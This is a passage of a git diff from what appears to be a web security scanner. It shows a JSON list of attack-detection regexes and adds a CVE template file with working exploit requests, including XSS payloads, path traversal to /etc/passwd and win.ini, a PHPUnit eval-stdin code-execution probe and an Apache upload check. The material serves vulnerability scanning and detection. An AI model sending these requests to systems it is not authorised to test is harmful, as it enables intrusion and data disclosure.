methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":19,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:set|atob|btoa|charat|charcodeat|charset|concat|crypto|frames|fromcharcode|indexof|lastindexof|match|navigator|toolbar|menubar|replace|regexp|slice|split|substr|substring|escape|\\w+codeuri\\w*)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript string properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":20,"rule":"(?:\\)\\s*\\[)|([^*\":\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z_@\\|])(\\s*return\\s*)?(?:globalstorage|sessionstorage|postmessage|callee|constructor|content|domain|prototype|try|catch|top|call|apply|url|function|object|array|string|math|if|for\\s*(?:each)?|elseif|case|switch|regex|boolean|location|(?:ms)?setimmediate|settimeout|setinterval|void|setexpression|namespace|while)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\".+\\-\\/]))","description":"Detects JavaScript language constructs","tags":["xss","csrf","id","rfe"],"impact":4},{"id":21,"rule":"(?:,\\s*(?:alert|showmodaldialog|eval)\\s*,)|(?::\\s*eval\\s*[^\\s])|([^:\\s\\w,.\\/?+-]\\s*)?(?<![a-z\\/_@])(\\s*return\\s*)?(?:(?:document\\s*\\.)?(?:.+\\/)?(?:alert|eval|msgbox|showmod(?:al|eless)dialog|showhelp|prompt|write(?:ln)?|confirm|dialog|open))\\s*(?:[^.a-z\\s\\-]|(?:\\s*[^\\s\\w,.@\\/+-]))|(?:java[\\s\\/]*\\.[\\s\\/]*lang)|(?:\\w\\s*=\\s*new\\s+\\w+)|(?:&\\s*\\w+\\s*\\)[^,])|(?:\\+[\\W\\d]*new\\s+\\w+[\\W\\d]*\\+)|(?:document\\.\\w)","description":"Detects very basic XSS probings","tags":["xss","csrf","id","rfe"],"impact":3},{"id":22,"rule":"(?:=\\s*(?:top|this|window|content|self|frames|_content))|(?:\\/\\s*[gimx]*\\s*[)}])|(?:[^\\s]\\s*=\\s*script)|(?:\\.\\s*constructor)|(?:default\\s+xml\\s+namespace\\s*=)|(?:\\/\\s*\\+[^+]+\\s*\\+\\s*\\/)","description":"Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces","tags":["xss","csrf","id","rfe"],"impact":5},{"id":23,"rule":"(?:\\.\\s*\\w+\\W*=)|(?:\\W\\s*(?:location|document)\\s*\\W[^({[;]+[({[;])|(?:\\(\\w+\\?[:\\w]+\\))|(?:\\w{2,}\\s*=\\s*\\d+[^&\\w]\\w+)|(?:\\]\\s*\\(\\s*\\w+)","description":"Detects JavaScript location/document property access and window access obfuscation","tags":["xss","csrf"],"impact":5},{"id":24,"rule":"(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])","description":"Detects basic obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":25,"rule":"(?:=\\s*[$\\w]\\s*[\\(\\[])|(?:\\(\\s*(?:this|top|window|self|parent|_?content)\\s*\\))|(?:src\\s*=s*(?:\\w+:|\\/\\/))|(?:\\w+\\[(\"\\w+\"|\\w+\\|\\|))|(?:[\\d\\W]\\|\\|[\\d\\W]|\\W=\\w+,)|(?:\\/\\s*\\+\\s*[a-z\"])|(?:=\\s*\\$[^([]*\\()|(?:=\\s*\\(\\s*\")","description":"Detects obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":26,"rule":"(?:[^:\\s\\w]+\\s*[^\\w\\/](href|protocol|host|hostname|pathname|hash|port|cookie)[^\\w])","description":"Detects JavaScript cookie stealing and redirection attempts","tags":["xss","csrf"],"impact":4},{"id":27,"rule":"(?:(?:vbs|vbscript|data):.*[,+])|(?:\\w+\\s*=\\W*(?!https?)\\w+:)|(jar:\\w+:)|(=\\s*\"?\\s*vbs(?:ript)?:)|(language\\s*=\\s?\"?\\s*vbs(?:ript)?)|on\\w+\\s*=\\*\\w+\\-\"?","description":"Detects data: URL injections, VBS injections and common URI schemes","tags":["xss","rfe"],"impact":5},{"id":28,"rule":"(?:firefoxurl:\\w+\\|)|(?:(?:file|res|telnet|nntp|news|mailto|chrome)\\s*:\\s*[%&#xu\\/]+)|(wyciwyg|firefoxurl\\s*:\\s*\\/\\s*\\/)","description":"Detects IE firefoxurl injections, cache poisoning attempts and local file inclusion/execution","tags":["xss","rfe","lfi","csrf"],"impact":5},{"id":29,"rule":"(?:binding\\s?=|moz-binding|behavior\\s?=)|(?:[\\s\\/]style\\s*=\\s*[-\\\\])","description":"Detects bindings and behavior injections","tags":["xss","csrf","rfe"],"impact":4},{"id":30,"rule":"(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:\\/\\s*\\?\\s*\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)","description":"Detects common XSS concatenation patterns 1/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":31,"rule":"(?:=\\s*\\d*\\.\\d*\\?\\d*\\.\\d*)|(?:[|&]{2,}\\s*\")|(?:!\\d+\\.\\d*\\?\")|(?:\\/:[\\w.]+,)|(?:=[\\d\\W\\s]*\\[[^]]+\\])|(?:\\?\\w+:\\w+)","description":"Detects common XSS concatenation patterns 2/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":32,"rule":"(?:[^\\w\\s=]on(?!g\\&gt;)\\w+[^=_+-]*=[^$]+(?:\\W|\\&gt;)?)","description":"Detects possible event handlers","tags":["xss","csrf"],"impact":4},{"id":33,"rule":"(?:\\<\\w*:?\\s(?:[^\\>]*)t(?!rong))|(?:\\<scri)|(<\\w+:\\w+)","description":"Detects obfuscated script tags and XML wrapped HTML","tags":["xss"],"impact":4},{"id":34,"rule":"(?:\\<\\/\\w+\\s\\w+)|(?:@(?:cc_on|set)[\\s@,\"=])","description":"Detects attributes in closing tags and conditional compilation tokens","tags":["xss","csrf"],"impact":4},{"id":35,"rule":"(?:--[^\\n]*$)|(?:\\<!-|-->)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:<!\\[\\W)|(?:\\]!>)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\<base\\s+)|(?:<!(?:element|entity|\\[CDATA))","description":"Detects base href injections and XML entity injections","tags":["xss","csrf","id"],"impact":5},{"id":38,"rule":"(?:\\<[\\/]?(?:[i]?frame|applet|isindex|marquee|keygen|script|audio|video|input|button|textarea|style|base|body|meta|link|object|embed|param|plaintext|xm\\w+|image|im(?:g|port)))","description":"Detects possibly malicious html elements including some attributes","tags":["xss","csrf","id","rfe","lfi"],"impact":4},{"id":39,"rule":"(?:\\\\x[01fe][\\db-ce-f])|(?:%[01fe][\\db-ce-f])|(?:&#[01fe][\\db-ce-f])|(?:\\\\[01fe][\\db-ce-f])|(?:&#x[01fe][\\db-ce-f])","description":"Detects nullbytes and other dangerous characters","tags":["id","rfe","xss"],"impact":5},{"id":40,"rule":"(?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\()","description":"Detects MySQL comments, conditions and ch(a)r injections","tags":["sqli","id","lfi"],"impact":6},{"id":41,"rule":"(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]}
diff --git a/db/cves.json b/db/cves.json
new file mode 100644
index 00000000..f2ab6439
--- /dev/null
+++ b/db/cves.json
@@ -0,0 +1 @@
+{"templates":[{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\"><img src=x onerror=alert(document.domain)>","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: 